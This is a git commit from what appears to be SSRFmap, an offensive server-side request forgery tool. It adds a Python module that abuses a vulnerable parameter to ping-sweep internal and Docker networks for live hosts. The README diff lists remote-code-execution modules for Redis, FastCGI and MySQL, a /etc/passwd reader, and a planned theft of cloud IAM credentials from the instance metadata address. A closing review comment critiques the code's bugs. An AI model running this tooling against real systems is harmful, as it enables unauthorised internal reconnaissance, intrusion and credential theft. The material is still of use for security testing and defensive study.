MODULE - Network scan : HTTP ping sweep of the network

pull/2/head
Swissky 2018-10-16 22:42:39 +02:00
parent 65c73647f8
commit ed066d4622
3 changed files with 79 additions and 1 deletions


@ -49,7 +49,11 @@ The following modules are already implemented and can be used with the `-m` argu
| `fastcgi` | FastCGI RCE |
| `redis` | Redis RCE |
| `github` | Github Enterprise RCE < 2.8.7 |
| `zaddix` | Zaddix RCE |
| `mysql` | MySQL Command execution |
| `smtp` | SMTP send mail |
| `portscan` | Scan ports for the host |
| `networkscan` | HTTP Ping sweep over the network |
| `readfiles` | Read files such as `/etc/passwd` |
## Contribute
@ -58,7 +62,6 @@ I <3 pull requests :)
Feel free to add any feature listed below or a new service.
- --level arg - ability to tweak payloads in order to bypass some IDS/WAF. E.g: `127.0.0.1 -> [::] -> 0000: -> ...`
- networkscan - same a portscan, we want to discover machines in the same network
- aws and other cloud providers - extract sensitive data from http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy and more
- sockserver - SSRF SOCK proxy server - https://github.com/iamultra/ssrfsocks
- handle request with file in requester


@ -10,6 +10,7 @@ author = "Swissky"
# https://spyclub.tech/2018/ssrf-through-gopher/
# https://github.com/eboda/34c3ctf/tree/master/extract0r
# https://infosec.rm-it.de/2018/07/29/isitdtu-ctf-2018-friss/
# http://shaobaobaoer.cn/archives/643/gopher-8de8ae-ssrf-mysql-a0e7b6
# Note
# This exploit is a Python 3 version of the Gopherus tool

74
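--- a/modules/networkscan.py
+++ b/modules/networkscan.py
@@ -0,0 +1,74 @@
+"""
+network scan
+swissky@crashlab ~
+$ curl -v "http://192.168.43.57"
+* Rebuilt URL to: http://192.168.43.57/
+* Trying 192.168.43.57...
+* TCP_NODELAY set
+* connect to 192.168.43.57 port 80 failed: Connexion refusée
+* Failed to connect to 192.168.43.57 port 80: Connexion refusée
+* Closing connection 0
+curl: (7) Failed to connect to 192.168.43.57 port 80: Connexion refusée
+swissky@crashlab ~
+$ curl -v "http://192.168.43.56" 7
+* Rebuilt URL to: http://192.168.43.56/
+* Trying 192.168.43.56...
+* TCP_NODELAY set
+* connect to 192.168.43.56 port 80 failed: Aucun chemin d'accès pour atteindre l'hôte cible
+* Failed to connect to 192.168.43.56 port 80: Aucun chemin d'accès pour atteindre l'hôte cible
+* Closing connection 0
+curl: (7) Failed to connect to 192.168.43.56 port 80: Aucun chemin d'accès pour atteindre l'hôte cible
+swissky@crashlab ~
+"""
+from core.utils import *
+from datetime import datetime
+import sys, struct, socket
+import logging
+import concurrent.futures
+name = "networkscan"
+description = "Scan the network - HTTP Ping sweep"
+author = "Swissky"
+class exploit():
+ips = set()
+def __init__(self, requester, args):
+logging.info("Module '{}' launched !".format(name))
+# concurrent requests in order to limit the time
+self.add_range("192.168.1.0/24") # Default network
+self.add_range("192.168.0.0/24") # Default network
+self.add_range("172.17.0.0/16") # Docker network
+self.add_range("172.18.0.0/16") # Docker network
+with concurrent.futures.ThreadPoolExecutor(max_workers=None) as executor:
+future_to_url = {executor.submit(self.concurrent_request, requester, args.param, ip, "80"): ip for ip in self.ips}
+def add_range(self, ip_cidr):
+(ip, cidr) = ip_cidr.split('/')
+cidr = int(cidr)
+host_bits = 32 - cidr
+i = struct.unpack('>I', socket.inet_aton(ip))[0] # note the endianness
+start = (i >> host_bits) << host_bits # clear the host bits
+end = start | ((1 << host_bits) - 1)
+# excludes the first and last address in the subnet
+for i in range(start, end):
+self.ips.add(socket.inet_ntoa(struct.pack('>I',i)))
+def concurrent_request(self, requester, param, host, port):
+try:
+payload = wrapper_http("", host, port.strip())
+r = requester.do_request(param, payload)
+if not "Connection refused" in r.text:
+timer = datetime.today().time().replace(microsecond=0)
+print("\t[{}] Found host :{}".format(timer, host+ " "*40))
+timer = datetime.today().time().replace(microsecond=0)
+except Exception as e:
+pass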
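Review bot: `add_range` does not do what its comment says: `range(start, end)` still includes the network address and only drops the broadcast address, so the loop should read `for i in range(start + 1, end):`. `ips = set()` is declared on the class, so every `exploit` instance shares and keeps growing the same set; initialise it in `__init__` with `self.ips = set()`. In `concurrent_request` the `except Exception as e: pass` hides every failure, including coding errors, and the second `timer = ...` assignment is dead code; log the exception at debug level instead, e.g. `logging.debug("request to %s failed: %s", host, e)`. The four ranges are hard-coded, so each run queues about 131,000 requests whether or not those networks are within the authorised test scope, and `future_to_url` is never read, so no result or error from the pool is checked; taking the ranges from an explicit argument would keep the run bounded to what the operator is permitted to test.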